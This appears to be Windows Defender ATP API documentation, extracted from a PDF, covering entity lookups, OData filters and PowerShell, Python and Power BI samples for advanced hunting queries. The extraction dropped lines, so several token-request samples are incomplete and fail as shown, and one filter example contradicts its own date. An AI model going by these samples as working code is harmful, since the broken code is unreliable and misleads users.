If successful and domain exists - 200 OK with list of machine entities. If domain do not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/domains/api.securitycenter.windows.com/machines
Response
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
},
{
"firstSeen": "2018-07-09T13:22:45.1250071Z",
"lastSeen": "2018-07-09T13:22:45.1250071Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "192.168.12.225",
"agentVersion": "10.5820.17724.1000",
"osBuild": 17724,
"rbacGroupId": 140,
"riskScore": "Low",
}
]
}
Get domain statistics API
Applies to:
Retrieves the prevalence for the given domain.
Permissions
Application URL.Read.All 'Read URLs'
NOTE
information)
HTTP request
GET /api/domains/{domain}/stats
Request headers
HEADER VALUE
Request body
Empty
Response
If successful and domain exists - 200 OK, with statistics object in the response body. If domain does not exist - 404
Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/domains/example.com/stats
Response
HTTP/1.1 200 OK
{
"@odata.context":
"https://api.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgDomainStats",
"host": "example.com",
"orgPrevalence": "4070",
"orgFirstSeen": "2017-07-30T13:23:48Z",
"orgLastSeen": "2017-08-29T13:09:05Z"
}
Was domain seen in org
Applies to:
Answers whether a domain was seen in the organization.
Permissions
Application Url.Read.All 'Read URLs'
NOTE
information)
HTTP request
GET /api/domains/{domain}
Request headers
HEADER VALUE
Request body
Empty
Response
If successful and domain exists - 200 OK. If domain does not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/domains/example.com
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Domains/$entity",
"host": "example.com"
}
File resource type
Applies to:
Represent a file entity in Windows Defender ATP.
Methods
Get file file Get a single file
List file related alerts alert collection Get the alert entities that are associated
with the file.
List file related machines machine collection Get the machine entities associated
with the alert.
file statistics Statistics summary Retrieves the prevalence for the given
file.
Properties
sha1 String Sha1 hash of the file content
sha256 String Sha256 hash of the file content
md5 String md5 hash of the file content
globalPrevalence Integer File prevalence across organization
globalFirstObserved DateTimeOffset First time the file was observed.
globalLastObserved DateTimeOffset Last time the file was observed.
size Integer Size of the file.
fileType String Type of the file.
isPeFile Boolean true if the file is portable executable

(e.g. "DLL", "EXE", etc.)
filePublisher String File publisher.

fileProductName String Product name.
signer String File signer.
issuer String File issuer.
signerHash String Hash of the signing certificate.
isValidCertificate Boolean Was signing certificate successfully

verified by Windows Defender ATP
agent.
Get file information API
Applies to:
Retrieves a file by identifier Sha1, Sha256, or MD5.
Permissions
Application File.Read.All 'Read all file profiles'
Delegated (work or school account) File.Read.All 'Read all file profiles'
NOTE
information)
HTTP request
GET /api/files/{id}
Request headers
Request body
Empty
Response
If successful and file exists - 200 OK with the file entity in the body. If file does not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Files/$entity",
"sha1": "6532ec91d513acc05f43ee0aa3002599729fd3e1",
"sha256": "d4447dffdbb2889b4b4e746b0bc882df1b854101614b0aa83953ef3cb66904cf",
"md5": "7f05a371d2beffb3784fd2199f81d730",
"globalPrevalence": 7329,
"globalFirstObserved": "2018-04-08T05:50:29.4459725Z",
"globalLastObserved": "2018-08-07T23:35:11.1361328Z",
"windowsDefenderAVThreatName": null,
"size": 391680,
"fileType": "PortableExecutable",
"isPeFile": true,
"filePublisher": null,
"fileProductName": null,
"signer": null,
"issuer": null,
"signerHash": null,
"isValidCertificate": null
}
Get file related alerts API
Applies to:
Retrieves a collection of alerts related to a given file hash.
Permissions
NOTE
information)
HTTP request
GET /api/files/{id}/alerts
Request headers
Request body
Empty
Response
If successful and file exists - 200 OK with list of alert entities in the body. If file do not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1/alerts
Response
HTTP/1.1 200 OK
{
"value": [
{
"id": "121688558380765161_2136280442",
"incidentId": 7696,
"severity": "High",
"status": "New",
}
]
}
Get file related machines API
Applies to:
Retrieves a collection of machines related to a given file hash.
Permissions
NOTE
information)
Response will include only machines, that the user have access to, based on machine group settings (See Create and
HTTP request
GET /api/files/{id}/machines
Request headers
Request body
Empty
Response
If successful and file exists - 200 OK with list of machine entities in the body. If file do not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/files/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/machines
Response
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
},
{
"firstSeen": "2018-07-09T13:22:45.1250071Z",
"lastSeen": "2018-07-09T13:22:45.1250071Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "192.168.12.225",
"agentVersion": "10.5820.17724.1000",
"osBuild": 17724,
"rbacGroupId": 140,
"riskScore": "Low",
}
]
}
Get file statistics API
Applies to:
Retrieves the prevalence for the given file.
Permissions
Application File.Read.All 'Read file profiles'
Delegated (work or school account) File.Read.All 'Read file profiles'
NOTE
information)
HTTP request
GET /api/files/{id}/stats
Request headers
Request body
Empty
Response
If successful and file exists - 200 OK with statistical data in the body. If file do not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1/stats
Response
HTTP/1.1 200 OK
{
"@odata.context":
"https://api.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgFileStats",
"sha1": "6532ec91d513acc05f43ee0aa3002599729fd3e1",
"orgFirstSeen": "2018-07-15T06:13:59Z",
"orgLastSeen": "2018-08-03T16:45:21Z",
"topFileNames": [
"chrome_1.exe",
"chrome_2.exe"
]
}
Get IP related alerts API
Applies to:
Retrieves a collection of alerts related to a given IP address.
Permissions
NOTE
information)
HTTP request
GET /api/ips/{ip}/alerts
Request headers
Request body
Empty
Response
If successful and IP exists - 200 OK with list of alert entities in the body. If IP do not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/ips/10.209.67.177/alerts
Response
HTTP/1.1 200 OK
{
"value": [
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"severity": "Low",
}
]
}
Get IP related machines API
Applies to:
Retrieves a collection of machines that communicated with or from a particular IP.
Permissions
NOTE
information)
Response will include only machines, that the user have access to, based on machine group settings (See Create and
HTTP request
GET /api/ips/{ip}/machines
Request headers
Request body
Empty
Response
If successful and IP exists - 200 OK with list of machine entities in the body. If IP do not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/ips/10.209.67.177/machines
Response
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
},
{
"firstSeen": "2018-07-09T13:22:45.1250071Z",
"lastSeen": "2018-07-09T13:22:45.1250071Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "192.168.12.225",
"agentVersion": "10.5820.17724.1000",
"osBuild": 17724,
"rbacGroupId": 140,
"riskScore": "Low",
}
]
}
Get IP statistics API
Applies to:
Retrieves the prevalence for the given IP.
Permissions
NOTE
information)
HTTP request
GET /api/ips/{ip}/stats
Request headers
Request body
Empty
Response
If successful and ip exists - 200 OK with statistical data in the body. IP do not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/ips/10.209.67.177/stats
Response
HTTP/1.1 200 OK
{
"@odata.context":
"https://api.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgIPStats",
"ipAddress": "10.209.67.177",
"orgFirstSeen": "2017-07-30T13:36:06Z",
"orgLastSeen": "2017-08-29T13:32:59Z"
}
Was IP seen in org
Applies to:
Answers whether an IP was seen in the organization.
Permissions
NOTE
information)
HTTP request
GET /api/ips/{ip}
Request headers
Request body
Empty
Response
If successful and IP exists - 200 OK. If IP do not exist - 404 Not Found.
Example
Request
GET https://api.securitycenter.windows.com/api/ips/10.209.67.177
Response

NOTE
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Ips/$entity",
"id": "10.209.67.177"
}
User resource type
Applies to:
List User related alerts alert collection List all the alerts that are associated
with a user.
List User related machines machine collection List all the machines that were logged
on by a user.
Get user related alerts API
Applies to:
Retrieves a collection of alerts related to a given user ID.
Permissions
NOTE
information)
HTTP request
GET /api/users/{id}/alerts
**Note that the id is not the full UPN, but only the user name. (e.g., to retrieve alerts for user1@contoso.com use
/api/users/user1/alerts) **
Request headers
Request body
Empty
Response
If successful and user exist - 200 OK. If the user do not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/users/user1/alerts
Response
HTTP/1.1 200 OK
{
"value": [
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"severity": "Low",
},
{
"id": "121688558380765161_2136280442",
"incidentId": 4123,
"severity": "Low",
}
]
}
Get user related machines API
Applies to:
Retrieves a collection of machines related to a given user ID.
Permissions
NOTE
information)
Response will include only machines that the user can access, based on machine group settings (See Create and manage
machine groups for more information)
HTTP request
GET /api/users/{id}/machines
**Note that the id is not the full UPN, but only the user name. (e.g., to retrieve machines for user1@contoso.com
use /api/users/user1/machines) **
Request headers
Request body
Empty
Response
If successful and user exists - 200 OK with list of machine entities in the body. If user does not exist - 404 Not
Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/users/user1/machines
Response
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
},
{
"firstSeen": "2018-07-09T13:22:45.1250071Z",
"lastSeen": "2018-07-09T13:22:45.1250071Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "192.168.12.225",
"agentVersion": "10.5820.17724.1000",
"osBuild": 17724,
"rbacGroupId": 140,
"riskScore": "Low",
}
]
}
Schedule Advanced Hunting using Microsoft Flow
Applies to:
IMPORTANT
Schedule advanced query.
Before you begin

You first need to create an app.
Use case
A common scenario is scheduling an advanced query and using the results for follow up actions and processing.
In this section we share sample for this purpose using Microsoft Flow (or Logic Apps).
Define a flow to run query and parse results

Use the following basic flow as an example.
1. Define the trigger – Recurrence by time.
2. Add an action: Select HTTP.
Set method to be POST

Uri is https://api.securitycenter.windows.com/api/advancedqueries/run or one of the region specific
locations
US: https://api-us.securitycenter.windows.com/api/advancedqueries/run
Europe: https://api-eu.securitycenter.windows.com/api/advancedqueries/run
United Kingdom: https://api-uk.securitycenter.windows.com/api/advancedqueries/run
Add the Header: Content-Type application/json
In the body write your query surrounded by single quotation mark (')
In the Advanced options select Authentication to be Active Directory OAuth
Set the Tenant with proper AAD Tenant Id
Audience is https://api.securitycenter.windows.com
Client ID is your application ID
Credential Type should be Secret
Secret is the application secret generated in the Azure Active directory.
3. You can use the "Parse JSON" action to get the schema of data – just "use sample payload to generate
schema" and copy an output from of the expected result.
Expand the flow to use the query results
The following section shows how to use the parsed results to insert them in SQL database.
This is an example only, you can use other actions supported by Microsoft Flow.
Add an 'Apply to each' action
Select the Results json (which was an output of the last parse action)
Add an 'Insert row' action – you will need to supply the connection details
Select the table you want to update and define the mapping between the WD -ATP output to the SQL. Note it is
possible to manipulate the data inside the flow. In the example I changed the type of the EventTime.
The output in the SQL DB is getting updates and can be used for correlation with other data sources. You can now
read from your table:
Full flow definition
You can find below the full definition
Related topic
Advanced Hunting API
Applies to:
Run advanced queries using PowerShell, see Advanced Hunting API.
In this section we share PowerShell samples to retrieve a token and use it to run a query.
Before you begin

You first need to create an app.
Preparation instructions
Open a PowerShell window.
If your policy does not allow you to run the PowerShell commands, you can run the below command:
Set-ExecutionPolicy -ExecutionPolicy Bypass
For more details, see PowerShell documentation
Get token
Run the following:
$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here

$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here
$body = [Ordered] @{
}
$response = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $body -ErrorAction Stop
$aadToken = $response.access_token
where
$tenantId: ID of the tenant on behalf of which you want to run the query (i.e., the query will be run on the data
of this tenant)
$appId: ID of your AAD app (the app must have 'Run advanced queries' permission to Windows Defender
ATP )
$appSecret: Secret of your AAD app
Run query
Run the following query:
$query = 'RegistryEvents | limit 10' # Paste your own query here
$url = "https://api.securitycenter.windows.com/api/advancedqueries/run"
$headers = @{
Authorization = "Bearer $aadToken"
}
$body = ConvertTo-Json -InputObject @{ 'Query' = $query }
$webResponse = Invoke-WebRequest -Method Post -Uri $url -Headers $headers -Body $body -ErrorAction Stop
$response = $webResponse | ConvertFrom-Json
$results = $response.Results
$schema = $response.Schema
$results contains the results of your query

$schema contains the schema of the results of your query
Complex queries
If you want to run complex queries (or multilines queries), save your query in a file and, instead of the first line in
the above sample, run the below command:
$query = [IO.File]::ReadAllText("C:\myQuery.txt"); # Replace with the path to your file
Work with query results

You can now use the query results.
To output the results of the query in CSV format in file file1.csv do the below:
$results | ConvertTo-Csv -NoTypeInformation | Set-Content file1.csv
To output the results of the query in JSON format in file file1.json do the below:
$results | ConvertTo-Json | Set-Content file1.json
Related topic
Advanced Hunting using Python
Applies to:
Run advanced queries using Python, see Advanced Hunting API.
In this section we share Python samples to retrieve a token and use it to run a query.
Prerequisite: You first need to create an app.
Get token
Run the following:
import json
import urllib.request
import urllib.parse
tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here

appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here
url = "https://login.windows.net/%s/oauth2/token" % (tenantId)
resourceAppIdUri = 'https://api.securitycenter.windows.com'
body = {
'resource' : resourceAppIdUri,
'client_id' : appId,
'client_secret' : appSecret,
'grant_type' : 'client_credentials'
}
data = urllib.parse.urlencode(body).encode("utf-8")
req = urllib.request.Request(url, data)

response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
aadToken = jsonResponse["access_token"]
where
tenantId: ID of the tenant on behalf of which you want to run the query (i.e., the query will be run on the data of
this tenant)
appId: ID of your AAD app (the app must have 'Run advanced queries' permission to Windows Defender ATP )
appSecret: Secret of your AAD app
Run query
Run the following query:
query = 'RegistryEvents | limit 10' # Paste your own query here
url = "https://api.securitycenter.windows.com/api/advancedqueries/run"
headers = {
'Content-Type' : 'application/json',
'Accept' : 'application/json',
'Authorization' : "Bearer " + aadToken
}
data = json.dumps({ 'Query' : query }).encode("utf-8")
req = urllib.request.Request(url, data, headers)

response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
schema = jsonResponse["Schema"]
results = jsonResponse["Results"]
schema contains the schema of the results of your query

results contains the results of your query
Complex queries
If you want to run complex queries (or multilines queries), save your query in a file and, instead of the first line in
the above sample, run the below command:
queryFile = open("D:\\Temp\\myQuery.txt", 'r') # Replace with the path to your file

query = queryFile.read()
queryFile.close()
Work with query results

You can now use the query results.
To iterate over the results do the below:
for result in results:

print(result) # Prints the whole result
print(result["EventTime"]) # Prints only the property 'EventTime' from the result
To output the results of the query in CSV format in file file1.csv do the below:
import csv
outputFile = open("D:\\Temp\\file1.csv", 'w')

output = csv.writer(outputFile)
output.writerow(results[0].keys())
for result in results:
output.writerow(result.values())
outputFile.close()
To output the results of the query in JSON format in file file1.json do the below:
outputFile = open("D:\\Temp\\file1.json", 'w')

json.dump(results, outputFile)
outputFile.close()
Related topic
Create custom reports using Power BI (app
authentication)
Run advanced queries and show results in Microsoft Power BI. Please read about Advanced Hunting API before.
In this section we share Power BI query sample to run a query using application token.
If you want to use user token instead please refer to this tutorial.
Run a query
Open Microsoft Power BI
Click Get Data > Blank Query
Click Advanced Editor
Copy the below and paste it in the editor, after you update the values of TenantId, AppId, AppSecret, Query
let
TenantId = "00000000-0000-0000-0000-000000000000", // Paste your own tenant ID here

AppId = "11111111-1111-1111-1111-111111111111", // Paste your own app ID here
AppSecret = "22222222-2222-2222-2222-222222222222", // Paste your own app secret here
Query = "MachineInfo | where EventTime > ago(7d) | summarize EventCount=count(),
LastSeen=max(EventTime) by MachineId", // Paste your own query here
ResourceAppIdUrl = "https://api.securitycenter.windows.com",
OAuthUrl = Text.Combine({"https://login.windows.net/", TenantId, "/oauth2/token"}, ""),
Resource = Text.Combine({"resource", Uri.EscapeDataString(ResourceAppIdUrl)}, "="),

ClientId = Text.Combine({"client_id", AppId}, "="),
ClientSecret = Text.Combine({"client_secret", Uri.EscapeDataString(AppSecret)}, "="),
GrantType = Text.Combine({"grant_type", "client_credentials"}, "="),
Body = Text.Combine({Resource, ClientId, ClientSecret, GrantType}, "&"),
AuthResponse= Json.Document(Web.Contents(OAuthUrl, [Content=Text.ToBinary(Body)])),

AccessToken= AuthResponse[access_token],
Bearer = Text.Combine({"Bearer", AccessToken}, " "),
AdvancedHuntingUrl = "https://api.securitycenter.windows.com/api/advancedqueries/run",
Response = Json.Document(Web.Contents(
AdvancedHuntingUrl,
[
Headers = [#"Content-Type"="application/json", #"Accept"="application/json",
#"Authorization"=Bearer],
Content=Json.FromValue([#"Query"=Query])
]
)),
TypeMap = #table(
{ "Type", "PowerBiType" },
{
{ "Double", Double.Type },
{ "Int64", Int64.Type },
{ "UInt64", Number.Type },
{ "Byte", Byte.Type },
{ "Single", Single.Type },
{ "Decimal", Decimal.Type },
{ "TimeSpan", Duration.Type },
{ "DateTime", DateTimeZone.Type },
{ "String", Text.Type },
{ "Boolean", Logical.Type },
{ "SByte", Logical.Type },
{ "Guid", Text.Type }
}),
Schema = Table.FromRecords(Response[Schema]),
TypedSchema = Table.Join(Table.SelectColumns(Schema, {"Name", "Type"}), {"Type"}, TypeMap ,
{"Type"}),
Results = Response[Results],
Rows = Table.FromRecords(Results, Schema[Name]),
Table = Table.TransformColumnTypes(Rows, Table.ToList(TypedSchema, (c) => {c{0}, c{2}}))
in Table
Click Done
Click Edit Credentials
Select Anonymous and click Connect
Repeat the previous step for the second URL

Click Continue
Select the privacy level you want and click Save
View the results of your query
Related topic
Create custom Power BI reports with user authentication
Windows Defender ATP APIs using PowerShell
Applies to:
Full scenario using multiple APIs from Windows Defender ATP.
In this section we share PowerShell samples to
Retrieve a token
Use token to retrieve the latest alerts in Windows Defender ATP
For each alert, if the alert has medium or high priority and is still in progress, check how many times the
machine has connected to suspicious URL.
Preparation Instructions
Open a PowerShell window.
If your policy does not allow you to run the PowerShell commands, you can run the below command:
Set-ExecutionPolicy -ExecutionPolicy Bypass
For more details, refer to PowerShell documentation
Get token
Run the below
$tenantId: ID of the tenant on behalf of which you want to run the query (i.e., the query will be run on the
data of this tenant)
$appId: ID of your AAD app (the app must have 'Run advanced queries' permission to Windows Defender
ATP )
$appSecret: Secret of your AAD app
$suspiciousUrl: The URL
$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here
$suspiciousUrl = 'www.suspiciousUrl.com' # Paste your own URL here
$resourceAppIdUri = 'https://securitycenter.onmicrosoft.com/windowsatpservice'
}
$aadToken = $authResponse.access_token
#Get latest alert

$alertUrl = "https://api.securitycenter.windows.com/api/alerts?`$top=10"
$headers = @{
Authorization = "Bearer $aadToken"
}
$alertResponse = Invoke-WebRequest -Method Get -Uri $alertUrl -Headers $headers -ErrorAction Stop
$alerts = ($alertResponse | ConvertFrom-Json).value
$machinesToInvestigate = New-Object System.Collections.ArrayList
Foreach($alert in $alerts)
{
#echo $alert.id $alert.machineId $alert.severity $alert.status
$isSevereAlert = $alert.severity -in 'Medium', 'High'

$isOpenAlert = $alert.status -in 'InProgress', 'New'
if($isOpenAlert -and $isSevereAlert)
{
if (-not $machinesToInvestigate.Contains($alert.machineId))
{
$machinesToInvestigate.Add($alert.machineId) > $null
}
}
}
$commaSeparatedMachines = '"{0}"' -f ($machinesToInvestigate -join '","')
$query = "NetworkCommunicationEvents
| where MachineId in ($commaSeparatedMachines)
| where RemoteUrl == `"$suspiciousUrl`"
| summarize ConnectionsCount = count() by MachineId"
$queryUrl = "https://api.securitycenter.windows.com/api/advancedqueries/run"
$queryBody = ConvertTo-Json -InputObject @{ 'Query' = $query }

$queryResponse = Invoke-WebRequest -Method Post -Uri $queryUrl -Headers $headers -Body $queryBody -ErrorAction
Stop
$response = ($queryResponse | ConvertFrom-Json).Results
$response
Related topic
Applies to:
If you are not familiar with OData queries, see: OData V4 queries
Not all properties are filterable.
Properties that supports $filter:
Alert: Id, IncidentId, AlertCreationTime, Status, Severity and Category.
Machine: Id, ComputerDnsName, LastSeen, LastIpAddress, HealthStatus, OsPlatform, RiskScore,
MachineTags and RbacGroupId.
MachineAction: Id, Status, MachineId, Type, Requestor and CreationDateTimeUtc.
Example 1
Get all the machines with the tag 'ExampleTag'
HTTP GET https://api.securitycenter.windows.com/api/machines?$filter=machineTags/any(tag: tag eq

'ExampleTag')
Response:
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "High",
"machineTags": [ "test tag 1", "test tag 2", "ExampleTag" ]
},
.
.
.
]
}
Example 2
Get all the alerts that created after 2018-10-20 00:00:00
HTTP GET https://api.securitycenter.windows.com/api/alerts?$filter=alertCreationTime gt 2018-11-22T00:00:00Z
Response:
HTTP/1.1 200 OK
{
"value": [
{
"id": "121688558380765161_2136280442",
"incidentId": 7696,
"severity": "High",
"status": "New",
},
.
.
.
]
}
Example 3
Get all the machines with 'High' 'RiskScore'
HTTP GET https://api.securitycenter.windows.com/api/machines?$filter=riskScore eq 'High'
Response:
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
},
.
.
.
]
}
Example 4
Get top 100 machines with 'HealthStatus' not equals to 'Active'
HTTP GET https://api.securitycenter.windows.com/api/machines?$filter=healthStatus ne 'Active'&$top=100
Response:
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
},
.
.
.
]
}
Example 5
Get all the machines that last seen after 2018-10-20
HTTP GET https://api.securitycenter.windows.com/api/machines?$filter=lastSeen gt 2018-08-01Z
Response:
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
},
.
.
.
]
}
Example 6
Get all the Anti-Virus scans that the user Analyst@examples.onmicrosoft.com created using Windows
Defender ATP
HTTP GET https://api.securitycenter.windows.com/api/machineactions?$filter=requestor eq

'Analyst@WcdTestPrd.onmicrosoft.com' and type eq 'RunAntiVirusScan'
Response:
HTTP/1.1 200 OK
{
"value": [
{
"id": "5c3e3322-d993-1234-1111-dfb136ebc8c5",
"requestor": "Analyst@examples.onmicrosoft.com",
"requestorComment": "1533",
"machineId": "123321c10e44a82877af76b1d0161a17843f688a",
"lastUpdateDateTimeUtc": "2018-11-12T13:34:32.0319826Z",
},
.
.
.
]
}
Example 7
Get the count of open alerts for a specific machine:
HTTP GET
https://api.securitycenter.windows.com/api/machines/123321d0c675eaa415b8e5f383c6388bff446c62/alerts/$count?
$filter=status ne 'Resolved'
Response:
HTTP/1.1 200 OK
Related topic
Get KB collection API
Applies to:
Retrieves a collection of KB's and KB details.
Permissions
User needs read permissions.
HTTP request
GET /testwdatppreview/kbinfo
Request headers
HEADER VALUE
Content type application/json
Request body
Empty
Response
If successful - 200 OK.
Example
Request
GET https://graph.microsoft.com/testwdatppreview/KbInfo
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://graph.microsoft.com/testwdatppreview/$metadata#KbInfo",
"@odata.count": 271,
"value":[
{
"id": "KB3097617 (10240.16549) Amd64",
"release": "KB3097617 (10240.16549)",
"publishingDate": "2015-10-16T21:00:00Z",
"version": "10.0.10240.16549",
"architecture": "Amd64"
},
…
}
Get CVE-KB map API
Applies to:
Retrieves a map of CVE's to KB's and CVE details.
Permissions
User needs read permissions.
HTTP request
GET /testwdatppreview/cvekbmap
Request headers
HEADER VALUE
Content type application/json
Request body
Empty
Response
If successful and map exists - 200 OK.
Example
Request
GET https://graph.microsoft.com/testwdatppreview/CveKbMap
Response
HTTP/1.1 200 OK
{
"@odata.context":"https://graph.microsoft.com/testwdatppreview/$metadata#CveKbMap",
"@odata.count": 4168,
"value": [
{
"cveKbId": "CVE-2015-2482-3097617",
"cveId": "CVE-2015-2482",
"kbId":"3097617",
"title": "Cumulative Security Update for Internet Explorer",
"severity": "Critical"
},
…
}
Enable the custom threat intelligence API in Windows
Defender ATP
Applies to:
Before you can create custom threat intelligence (TI) using REST API, you'll need to set up the custom threat
intelligence application through Windows Defender Security Center.
1. In the navigation pane, select Settings > Threat intel.
2. Select Enable threat intel API. This activates the Azure Active Directory application setup sections
with pre-populated values.
3. Copy the individual values or select Save details to file to download a file that contains all the values.
WARNING
The client secret is only displayed once. Make sure you keep a copy of it in a safe place.
For more information about getting a new secret see, Learn how to get a new secret.
4. Select Generate tokens to get an access and refresh token.

You’ll need to use the access token in the Authorization header when doing REST API calls.
Related topics
Use the threat intelligence API to create custom alerts
Applies to:
Understand threat intelligence concepts, then enable the custom threat intelligence application so that you can
proceed to create custom threat intelligence alerts that are specific to your organization.
You can use the code examples to guide you in creating calls to the custom threat intelligence API.
In this section
TOPIC DESCRIPTION
Understand threat intelligence concepts Understand the concepts around threat intelligence so that
you can effectively create custom intelligence for your
organization.
Enable the custom threat intelligence application Set up the custom threat intelligence application through
Windows Defender Security Center so that you can create
custom threat intelligence (TI) using REST API.
Create custom threat intelligence alerts Create custom threat intelligence alerts so that you can
generate specific alerts that are applicable to your
organization.
PowerShell code examples Use the PowerShell code examples to guide you in using the
custom threat intelligence API.
Python code examples Use the Python code examples to guide you in using the
custom threat intelligence API.
Experiment with custom threat intelligence alerts This article demonstrates an end-to-end usage of the threat
intelligence API to get you started in using the threat
intelligence API.
Troubleshoot custom threat intelligence issues Learn how to address possible issues you might encounter
while using the threat intelligence API.
Create custom alerts using the threat intelligence (TI)
application program interface (API)
Applies to:
You can define custom alert definitions and indicators of compromise (IOC ) using the threat intelligence API.
Creating custom threat intelligence alerts allows you to generate specific alerts that are applicable to your
organization.
Before you begin

Before creating custom alerts, you'll need to enable the threat intelligence application in Azure Active Directory
and generate access tokens. For more information, see Enable the custom threat intelligence application.
Use the threat intelligence REST API to create custom threat intelligence alerts
You can call and specify the resource URLs using one of the following operations to access and manipulate a
threat intelligence resource:
GET
POST
PATCH
PUT (used for managing entities relations only)
DELETE
All threat intelligence API requests use the following basic URL pattern:
https://TI.SecurityCenter.Windows.com/{version}/{resource}?[query_parameters]
For this URL:

https://TI.SecurityCenter.Windows.com is the threat intelligence API endpoint.
{version} is the target service version. Currently, the only supported version is: v1.0.
{resource} is resource segment or path, such as:
AlertDefinitions (for specific single resource, add: (id))
IndicatorsOfCompromise (for specific single resource, add: (id))
[query_parameters] represents additional query parameters such as $filter and $select.
Quotas
Each tenant has a defined quota that limits the number of possible alert definitions, IOCs and another quota for
IOCs of Action different than “equals” in the system. If you upload data beyond this quota, you'll encounter an
HTTP error status code 507 (Insufficient Storage).
Request an access token from the token issuing endpoint

Windows Defender ATP Threat Intelligence API uses OAuth 2.0. In the context of Windows Defender ATP, the
alert definitions are a protected resource. To issue tokens for ad-hoc, non-automatic operations you can use the
Settings page and click the Generate Token button. However, if you’d like to create an automated client, you
need to use the “Client Credentials Grant” flow. For more information, see the OAuth 2.0 authorization
framework.
For more information about the authorization flow, see OAuth 2.0 authorization flow.
Make an HTTP POST request to the token issuing endpoint with the following parameters, replacing <ClientId> ,
<ClientSecret> , and <AuthorizationServerUrl> with your app's client ID, client secret and authorization server
URL.
NOTE
The authorization server URL is https://login.windows.net/<AADTenantID>/oauth2/token . Replace <AADTenantID>
with your Azure Active Directory tenant ID.
